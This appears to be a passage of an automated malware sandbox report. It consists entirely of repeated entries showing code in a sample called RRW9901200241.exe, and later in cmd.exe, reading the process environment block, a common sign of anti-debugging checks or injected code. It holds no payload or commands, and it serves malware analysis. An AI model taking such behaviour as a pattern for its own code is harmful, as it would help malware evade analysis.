          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0158B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0158B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0158B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0158B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0158B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0158B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01573884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01573884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01523B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01523B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01522397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015AD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01501B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01501B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01524BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01524BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01524BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01584257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01513A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01508A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01534A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01534A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01522ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01522AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01517D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01533D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01573540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0157A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01503D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01524D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01524D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01524D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015A8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01522581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01522581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01522581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01522581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01521DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01521DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01521DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0158C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0158C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01576CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0158FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0158FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015337F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01577794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01577794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01577794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01508794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01507E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01507E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01507E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01507E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01507E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01507E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01528E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015AFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01538EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015AFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0158FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002CB5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03068B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03065BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99240 mov eax, dword ptr fs:[00000030h]
